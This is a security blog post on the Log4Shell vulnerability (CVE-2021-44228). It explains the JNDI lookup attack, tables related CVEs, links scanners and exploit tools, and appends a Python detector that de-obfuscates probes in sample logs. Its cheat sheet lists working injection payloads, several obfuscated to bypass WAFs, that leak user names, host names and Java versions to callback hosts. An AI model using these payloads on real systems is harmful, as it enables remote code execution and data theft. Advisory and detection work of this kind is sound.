Log4j RCE 💣- Exploit - Advisory - Resource & Cheat Sheet

(CVE-2021-44228) Log4j RCE 0-day Details, Advisory & mitigation


On December 9, 2021, Apache announced a critical remote code execution vulnerability impacting at least Apache Log4j 2 (versions 2.0 to 2.14.1). MITRE designated this vulnerability CVE-2021-44228, with the highest severity rating of 10.0. Security researchers also know it as Log4Shell or LogJam. If exploited, this vulnerability allows adversaries to take full control of the impacted system.

Log4j 2 is a commonly used open-source third-party Java logging library used in software applications and services.

How the attack works:

After the initial jndi: string is inserted into a logged value, the vulnerable logger follows the URI it contains to fetch a secondary payload, which causes command execution.


The attacker constructs an initial jndi: lookup string and includes it in the User-Agent HTTP header:

User-Agent: ${jndi:ldap://<host>:<port>/<path>}

The vulnerable Log4j instance now makes an LDAP query to the included URI. The LDAP server then responds with directory information containing the link to the secondary payload:

Security Advisories / Bulletins [ Total: 218 ]


Big thanks to @SwitHak for all the advisory maintenance. We also kindly request everyone (individual, team, organisation, or firm) to comment below with the link of any advisory or resource (tools/scripts) that needs to be added.


The Apache Log4j RCE vulnerability is much bigger than we think, because Log4j is used everywhere. In 2015, Java stated that it has over 10 million developers and runs on 56 billion devices globally.

Here are the brief details on the Log4Shell vulnerability in the Apache Log4j utility.

| CVE | Severity | CVSS Score | Kind | Fixed version | Reporter |
|---|---|---|---|---|---|
| CVE-2021-44228 | Critical | 10.0 | RCE | 2.15.0 | Chen Zhaojun of Alibaba Cloud Security Team |
| CVE-2021-45046 | Critical | 9.0 | RCE | 2.16.0 | Kai Mindermann of iCConsult |
| CVE-2021-45105 | High | 7.5 | DoS | 2.17.0 | Hideki Okamoto of Akamai Technologies |

Resources for Log4j Remote Code Execution Vulnerability Testing/Exploit

  • Log4j-detect - Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URLs, with multithreading.
  • log4shell-detector - Python-based scanner/detector for Log4Shell exploitation attempts.
  • Logout4Shell - One of the best tools to date. It is a "vaccine" for the Apache Log4Shell vulnerability (CVE-2021-44228). Logout4Shell exploits the vulnerability, and the payload it delivers forces the logger to reconfigure itself with the vulnerable setting disabled; this effectively blocks any further attempt to exploit Log4Shell on that server. Kudos to Cybereason.
  • Log4j2Scan - A Burp Suite extension written in Java that is useful for scanning for Log4j2 RCE.
  • BurpLog4j2Scan - Another Burp Suite passive scanning plug-in for Log4j2 RCE.
  • BurpShiroPassiveScan - A Burp Suite passive scanning plug-in that hopefully saves some penetration-testing time.
  • Log4j2Scan - Burp Suite passive scanning plug-in for the Log4j2 remote code execution vulnerability.
  • Log4Shell RCE Exploit - A fully independent exploit that does not require any 3rd-party binaries. The exploit sprays the payload into all HTTP headers that might be logged, such as X-Forwarding, Server-IP and User-Agent.
  • log4j-scan - A fully automated, accurate, and extensive scanner for finding vulnerable log4j hosts.
  • Pachine - Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation).

We are adding more! Please comment below if you have any.

Log4j RCE Cheat Sheet

 
${jndi:ldap://${env:user}.uedo81.dnslog.cn/exp}

${jndi:dns://${hostName}.uedo81.dnslog.cn/a}
${jndi:dns://${env:COMPUTERNAME}.uedo81.dnslog.cn/a}
${jndi:dns://${env:USERDOMAIN}.qnfw43.dnslog.cn/a}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://dslepf.dnslog.cn/tem}
${${lower:jndi}:${lower:rmi}://dslepf.dnslog.cn/tem}
${jndi:ldap://dslepf.dnslog.cn/exp}
${jndi:dns://aeutbj.example.com/ext}
${jndi:${lower:l}${lower:d}a${lower:p}://example.com/
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1:1389/ass}
${${::-j}ndi:rmi://127.0.0.1:1389/ass}
${jndi:rmi://a.b.c}
${${lower:jndi}:${lower:rmi}://q.w.e/poc}
${${lower:${lower:jndi}}:${lower:rmi}://a.s.d/poc}
${jndi:ldap://${env:JAVA_VERSION}.domain/a}
${jndi:ldap://${sys:java.version}.domain/a}
${jndi:ldap://${hostName}.domain/a}
${jndi:ldap://${sys:java.vendor}.domain/a}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a}
${j${k8s:k5:-ND}i${sd:k5:-:}ldap://mydogsbutt.com:1389/o} (AWS WAF bypass)
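As an added example that is not part of the original post or of any tool listed above, this Python script de-obfuscates the nested-lookup tricks used in the cheat sheet (lower:/upper: case folding, and the ${::-x} and ${env:NaN:-x} default-value tricks) the way Log4j's substitution would, then flags log lines whose normalized form contains a JNDI lookup, so a defender matches the variants rather than the literal string "jndi:". The sample log lines and the attacker.example host are constructed placeholders.

```python
import re

# One innermost ${...} lookup: a body containing no nested "${" or "}".
INNER = re.compile(r"\$\{([^${}]*)\}")

def resolve_lookup(body: str) -> str:
    """Resolve one innermost lookup body to what vulnerable Log4j 2 would substitute.
    lower:/upper: case-fold their argument; "name:-default" yields the default (the
    variable is assumed unset, which is what ${::-j} and ${env:NaN:-j} rely on); any
    other lookup (env:user, hostName, sys:...) stays as an opaque <marker>."""
    if body.startswith("lower:"):
        return body[len("lower:"):].lower()
    if body.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        return body.split(":-", 1)[1]
    return "<" + body + ">"

def normalize(text: str, max_rounds: int = 32) -> str:
    """Peel nested lookups inside-out until nothing changes; the cap bounds nesting depth."""
    for _ in range(max_rounds):
        resolved = INNER.sub(lambda m: resolve_lookup(m.group(1)), text)
        if resolved == text:
            break
        text = resolved
    return text

# Prefix matched case-insensitively: Log4j lower-cases it (the "jNDi" payload above relies on that).
JNDI_PROBE = re.compile(r"<jndi:(ldaps?|rmi|dns|iiop|corba|nds|http)", re.IGNORECASE)

def is_log4shell_probe(line: str) -> bool:
    """True when the line, once de-obfuscated, would trigger a JNDI lookup."""
    return JNDI_PROBE.search(normalize(line)) is not None

def scan(lines):
    """Return (original, normalized) pairs for every line that is a Log4Shell probe."""
    return [(ln, normalize(ln)) for ln in lines if is_log4shell_probe(ln)]
# Constructed sample access-log lines; attacker.example is a placeholder, not a real host.
SAMPLE_LOG = [
    '10.0.0.6 "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example:1389/a}"',
    '10.0.0.7 "GET / HTTP/1.1" 200 "${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://attacker.example/x}"',
    '10.0.0.8 "GET / HTTP/1.1" 200 "${${::-j}ndi:rmi://attacker.example:1389/x}"',
    '10.0.0.9 "GET / HTTP/1.1" 200 "${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//attacker.example/x}"',
    '10.0.0.10 "GET / HTTP/1.1" 200 "${jndi:ldap://${env:user}.attacker.example/exp}"',
    '10.0.0.11 "GET / HTTP/1.1" 200 "${ctx:requestId} benign lookup without JNDI"',
]

if __name__ == "__main__":
    for original, normalized in scan(SAMPLE_LOG):
        print(f"HIT {normalized}\n    from: {original}")
```

The normalized form is worth keeping in the alert, since it shows the analyst which callback host and which leaked variables (for example env:user) the probe targeted.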

We are adding more! Please comment below if you have any.

Once again, we request everyone (individual, team, organisation, or firm) to comment below with the link of any advisory or resource (tools/scripts) that needs to be added, or any cheat sheet entry that bypasses WAF filters.

Image: fastly.com